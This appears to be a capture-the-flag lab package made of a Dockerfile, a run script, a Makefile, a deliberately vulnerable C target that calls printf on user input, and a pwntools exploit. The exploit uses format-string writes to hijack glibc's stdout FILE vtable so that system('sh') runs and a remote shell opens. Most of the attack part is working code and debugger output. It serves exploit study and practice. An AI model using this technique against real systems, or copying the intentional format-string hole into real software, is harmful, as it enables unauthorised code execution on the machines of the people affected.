# Base image for serving ./vuln.  Debian jessie ships glibc 2.19, which still
# dispatches through a FILE's vtable pointer without validating it (that check
# arrived in glibc 2.24), so the stdout-vtable hijack used by the exploit
# script works against the libc installed here.
# NOTE(review): jessie is EOL and its packages moved to archive.debian.org;
# on a stock debian:jessie image `apt-get update` may fail until
# /etc/apt/sources.list is repointed there (with Check-Valid-Until disabled).
FROM debian:jessie
# Keep apt from prompting during the unattended build.
ENV DEBIAN_FRONTEND noninteractive
# libc6-i386: the 32-bit libc the -m32 vuln binary needs at run time;
# socat: used by the run script to expose vuln on a TCP port.
# Install and clean in a single layer so the apt cache is not baked into the
# image.
RUN \
apt-get update && \
apt-get install -y libc6-i386 socat && \
apt-get clean && \
rm -rf /var/cache/apt/archives/* /var/lib/apt/lists/*
# Default command only; the run script supplies socat as the container
# command, which overrides this.
CMD ["/bin/bash"]
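#!/usr/bin/env python2
"""Exploit for vuln.c: format-string writes into stdout's FILE vtable pointer.

The target leaks &system, &stdout and sizeof(FILE), then calls printf() on our
line.  We use pwntools' fmtstr_payload to plant a fake vtable so that the next
write to stdout dispatches to system() with the FILE object itself as the
command string (see the gdb trace below).  This relies on a libc that does not
validate vtable pointers, i.e. glibc older than 2.24 (jessie ships 2.19).

Usage:
    ./exploit.py                    # target the docker bridge address below
    ./exploit.py remote HOST PORT   # target an arbitrary host
"""
from pwn import *
import sys

context(os='linux', arch='i386')

# Sample run used to locate our buffer among printf()'s stack arguments:
# $ ./vuln
# [*] addr_libc_system: 0xf752d290
# [*] addr_libc_stdout: 0xf76add40
# [*] sizeof(*stdout): 0x94
# [*] pwn me!
# AAAA%p.%p.%p.%p.%p.%p.%p.%p
# AAAA0x100.0xf76ad580.(nil).0xffa16100.(nil).(nil).0x41414141.0x252e7025
# 'AAAA' (0x41414141) is the 7th %p, so %7$... addresses the start of our
# buffer.
fsb_index = 7

# The target reads with fgets(buf, 0x100, stdin): at most 0xff bytes, and
# sendline() appends a '\n'.  Anything longer would be silently truncated.
MAX_PAYLOAD = 0x100 - 2

# Default target is the docker bridge address printed by the run script;
# 'remote HOST PORT' overrides it.  (The original left the remote branch as
# r = None, which crashed on the first recv.)
if 'remote' in sys.argv:
    i = sys.argv.index('remote')
    if len(sys.argv) < i + 3:
        sys.exit('usage: {} [remote HOST PORT]'.format(sys.argv[0]))
    host, port = sys.argv[i + 1], int(sys.argv[i + 2])
else:
    host, port = '172.17.0.2', 4000
r = remote(host, port)


def read_leak(conn, name):
    """Parse the next '[*] <name>: 0x...' line from the target and log it."""
    conn.recvuntil(name + ': ')
    value = int(conn.recvline().strip(), 16)
    log.success('{}: 0x{:x}'.format(name, value))
    return value


addr_libc_system = read_leak(r, 'addr_libc_system')
addr_libc_stdout = read_leak(r, 'addr_libc_stdout')
sizeof_stdout = read_leak(r, 'sizeof(*stdout)')

# stdout is an _IO_FILE_plus: the FILE struct followed immediately by the
# vtable pointer, so &vtable == &stdout + sizeof(FILE).
addr_libc_stdout_vtable = addr_libc_stdout + sizeof_stdout
log.success('addr_libc_stdout_vtable: 0x{:x}'.format(addr_libc_stdout_vtable))

r.recvuntil('pwn me!\n')

# gdb trace of the vtable call that fires on the next stdout write, after
# overwriting the vtable pointer with 'DCBA':
#
# ECX: 0x41424344 ('DCBA') <- addr_libc_stdout_vtable
#
# 0xf758707c: mov DWORD PTR [esp+0x8],edx
# 0xf7587080: mov DWORD PTR [esp+0x4],eax
# 0xf7587084: mov DWORD PTR [esp],esi
# => 0xf7587087: call DWORD PTR [ecx+0x1c]
# 0xf758708a: mov edx,DWORD PTR [esp+0x18]
# 0xf758708e: cmp eax,edx
# 0xf7587090: mov eax,0xffffffff
# 0xf7587095: cmovne edi,eax
# Guessed arguments:
# arg[0]: 0xf76e8ac0 --> 0xfbad2887 <- addr_libc_stdout
# arg[1]: 0xffd477b0 --> 0xf76e8b54 ("DCBA") <- buf
# arg[2]: 0x342

# Three writes:
#   stdout (its _flags field) <- "sh\0\0"
#       arg[0] of the vtable call is the FILE* itself, so it doubles as the
#       command string passed to system().
#   stdout - 4                <- &system
#       the one slot of the fake vtable we need; this clobbers whatever
#       precedes _IO_2_1_stdout_ in libc's data, which no longer matters
#       once we have a shell.
#   &stdout.vtable            <- stdout - 0x1c - 4
#       fake vtable chosen so that [vtable + 0x1c] (the slot the trace above
#       calls through) lands on the &system we just wrote.
writes = {
    addr_libc_stdout: u32(b'sh\x00\x00'),
    addr_libc_stdout - 0x04: addr_libc_system,
    addr_libc_stdout_vtable: addr_libc_stdout - 0x1c - 0x04,
}
payload = fmtstr_payload(fsb_index, writes)

# Sanity-check the payload against the target's fgets() before sending: it
# must fit the buffer, and it must not contain 0x0a -- fgets() stops at a
# newline and the target addresses fmtstr_payload appends would be lost.
# A 0x0a byte inside a leaked libc address is rare but possible under ASLR.
if len(payload) > MAX_PAYLOAD:
    log.error('payload too long for fgets(): {} > {}'.format(len(payload), MAX_PAYLOAD))
if b'\n' in payload:
    log.error('payload contains 0x0a; rerun the target to get different addresses')

r.sendline(payload)
r.clean()
r.interactive()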
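# Build the 32-bit target with the stack canary (-fstack-protector-strong)
# and full RELRO (-z relro -z now) deliberately left on: the exploit never
# touches the return address or the GOT, only libc's stdout vtable pointer,
# so neither mitigation stops it.  -no-pie is not actually required by the
# exploit, which uses leaked libc addresses only.
# Not enabled, and worth knowing why: -D_FORTIFY_SOURCE=2 (with -O1 or
# higher) would route printf(buf) through __printf_chk, which rejects %n in
# a writable format string and would break the write primitive.
# The recipe line must start with a tab, as make requires.
vuln: vuln.c
	gcc -std=c11 -m32 -no-pie -fstack-protector-strong -Wl,-z,relro,-z,now vuln.c -o vuln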
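#!/usr/bin/env bash
# Build the jessie+socat image, serve ./vuln on TCP 4000 inside a container
# and print the bridge address to connect to.  The service is deliberately
# exploitable, so the container is treated as hostile.
set -euo pipefail

echo "[*] building a docker container"
docker build -t debian-socat . --no-cache --rm

echo "[*] starting a docker container"
# A successful exploit yields a shell inside the container.  Mount the
# working tree read-only so that shell cannot tamper with files on the host,
# and drop all capabilities -- socat only needs an unprivileged port and
# fork/exec.
CID=$(docker run -d --cap-drop=ALL -v "$PWD":/work:ro debian-socat \
  /usr/bin/socat tcp-listen:4000,reuseaddr,fork exec:/work/vuln)

# http://stackoverflow.com/questions/17157721/getting-a-docker-containers-ip-address-from-the-host
# Port 4000 is not published, so it is reachable only over the docker bridge;
# the printed address is the one the exploit's default target must match.
docker inspect --format '[+] nc {{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}} 4000' "$CID"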
#include <stdio.h>
#include <stdlib.h>
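/*
 * Deliberately vulnerable target: leaks the two libc addresses the exploit
 * needs, then calls printf() with user input as the format string.
 */
int main(void) {
  /* Unbuffered stdio so the leak lines reach the client before we block in
   * fgets(), even when stdout is a socket (socat). */
  setvbuf(stdin, NULL, _IONBF, 0);
  setvbuf(stdout, NULL, _IONBF, 0);

  /* Intentional info-leaks so the exploit needs no separate ASLR bypass:
   * &system and &_IO_2_1_stdout_ (stdout's FILE object) inside libc. */
  printf("[*] addr_libc_system: %p\n", (void *)system);
  printf("[*] addr_libc_stdout: %p\n", (void *)stdout);
  /* sizeof(FILE): the exploit adds this to &stdout to reach the vtable
   * pointer that follows the FILE in _IO_FILE_plus.  %zx is the correct
   * conversion for size_t; the previous %lx only worked because long and
   * size_t happen to be the same width under -m32. */
  printf("[*] sizeof(*stdout): 0x%zx\n", sizeof(*stdout));
  printf("[*] pwn me!\n");

  char buf[0x100];
  /* On EOF or error fgets() leaves buf uninitialized; bail out instead of
   * handing stack garbage to printf(). */
  if (fgets(buf, sizeof buf, stdin) == NULL)
    return 1;

  /* INTENTIONAL format-string vulnerability: a user-controlled format gives
   * arbitrary stack reads (%p/%s) and writes (%n).  This is the bug the
   * exploit script targets; never do this outside a CTF. */
  printf(buf);
  return 0;
}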